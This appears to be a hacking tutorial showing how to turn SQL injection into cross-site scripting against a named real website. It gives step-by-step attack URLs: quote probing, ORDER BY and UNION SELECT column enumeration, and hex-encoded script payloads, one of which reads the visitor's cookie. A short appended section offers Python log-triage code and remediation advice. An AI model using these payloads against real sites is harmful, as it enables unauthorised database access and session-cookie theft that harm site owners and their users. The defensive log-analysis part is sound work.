SQL Injection to XSS #1

-
Hi friends.
I'm ikal.
Here I'm going to share how to do SQL Injection To XSS.
-

So what is SQL Injection To XSS?
SQL Injection To XSS is an ordinary SQL injection where, at the union select stage, once we get the "angka togel" (the column numbers that are reflected in the page), those reflected columns are used to pop an XSS alert or prompt: the XSS code is converted (hex-encoded) and placed in one of the reflected columns.
That's my definition, anyway :'v

So how do we do it? Let's do it with me.

Target : skyfood.us
Here I'll jump straight to the injection step so this doesn't take too long.

> Let's try putting in a single quote or something like that.

http://skyfood.us/products-details.php?cd_item=8000011D-1230659122'

The page will then look different from the normal page.
> Next we use order by to determine the number of columns.
> Here I already know the column count is 147, to save time. If anyone doesn't yet know how to determine the column count, you can check the previous article, SQL Injection manual.

http://skyfood.us/products-details.php?cd_item=8000011D-1230659122' order by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147-- -

> That's a lot.
> Now we union select to get the reflected column numbers.

http://skyfood.us/products-details.php?cd_item=8000011D-1230659122' and 0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147-- -


> And we are given the numbers 4,32,78,79,91,92,93,94,95,96,97 to work with.
> Now we'll do the SQL Injection To XSS, by inserting the code:
<script>alert('1');</script>
and converting it, then wrapping it in concat.

Example :
concat(<script>alert('Injected By 1K4lL_*');</script>)
Convert or encode it to hex :
concat(0x3c7363726970743e616c6572742827496e6a656374656420427920314b346c4c5f2a27293b3c2f7363726970743e)

> Put it in a reflected column. Example :
http://skyfood.us/products-details.php?cd_item=8000011D-1230659122' and 0 union select 1,2,3,concat(0x3c7363726970743e616c6572742827496e6a656374656420427920314b346c4c5f2a27293b3c2f7363726970743e),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147-- -


> Success.
> Now let's try to grab the cookie and domain using prompt.
Example :
concat(<script>prompt('Injected By 1K4lL_*',document.cookie);</script>)
Convert or encode it to hex :
concat(0x3c7363726970743e70726f6d70742827496e6a656374656420427920314b346c4c5f2a272c646f63756d656e742e636f6f6b6965293b3c2f7363726970743e)

> Put it in a reflected column. Example :
http://skyfood.us/products-details.php?cd_item=8000011D-1230659122' and 0 union select 1,2,3,concat(0x3c7363726970743e70726f6d70742827496e6a656374656420427920314b346c4c5f2a272c646f63756d656e742e636f6f6b6965293b3c2f7363726970743e),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147-- -


> Success.
> If you want to get the domain, just change it to :
concat(<script>prompt('Injected By 1K4lL_*',document.domain);</script>)
Then encode it and paste it into a reflected column.
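From the defender's side, the request shape walked through above (a quote break, a UNION SELECT, and a hex literal wrapped in concat that decodes to HTML markup) is easy to triage from web server logs. The following Python is an added example, not code from the original post; the sample request paths are constructed to mirror the post's requests, and the regexes and function names are my own.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample log entries (request paths only), shaped like the
# requests in the post: a normal request, a quote break, and a UNION SELECT
# that smuggles a hex-encoded string through concat().
SAMPLE_REQUESTS = [
    "/products-details.php?cd_item=8000011D-1230659122",
    "/products-details.php?cd_item=8000011D-1230659122'",
    "/products-details.php?cd_item=8000011D-1230659122'%20and%200%20union%20select%201,2,3,"
    "concat(0x3c7363726970743e616c6572742827496e6a656374656420427920314b346c4c5f2a27293b3c2f7363726970743e),5--%20-",
]

UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.IGNORECASE)
HEX_LITERAL = re.compile(r"\b0x([0-9a-fA-F]{2,})\b")
HTML_TAG = re.compile(r"<\s*/?\s*[a-zA-Z]")


def decode_hex_literals(sql_fragment):
    """Decode every MySQL-style 0x... literal in the fragment to text.

    Odd-length literals are left-padded with a zero, as MySQL does; bytes
    that are not valid UTF-8 are replaced rather than raising.
    """
    decoded = []
    for match in HEX_LITERAL.finditer(sql_fragment):
        hexdigits = match.group(1)
        if len(hexdigits) % 2:
            hexdigits = "0" + hexdigits
        decoded.append(bytes.fromhex(hexdigits).decode("utf-8", errors="replace"))
    return decoded


def triage_request(path):
    """Return findings for one logged request path after URL-decoding its query."""
    query = unquote_plus(urlsplit(path).query)
    literals = decode_hex_literals(query)
    return {
        "quote_break": "'" in query,
        "union_select": bool(UNION_SELECT.search(query)),
        "decoded_hex": literals,
        # Markup hidden inside a hex literal is the tell-tale of SQLi-to-XSS.
        "html_in_hex": any(HTML_TAG.search(text) for text in literals),
    }


def severity(findings):
    """Rank a request: markup via UNION SELECT is high, SQLi probing is medium."""
    if findings["union_select"] and findings["html_in_hex"]:
        return "high"
    if findings["union_select"] or findings["quote_break"]:
        return "medium"
    return "none"
```

Parameterised queries stop the UNION from reaching the database at all, and HTML-escaping every database value on output means that even a smuggled string renders as text rather than a script tag.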

Okay, that's all from me. In the next article I'll cover SQL Injection To XSS: dumping a basic statement in an alert.
Thanks
See u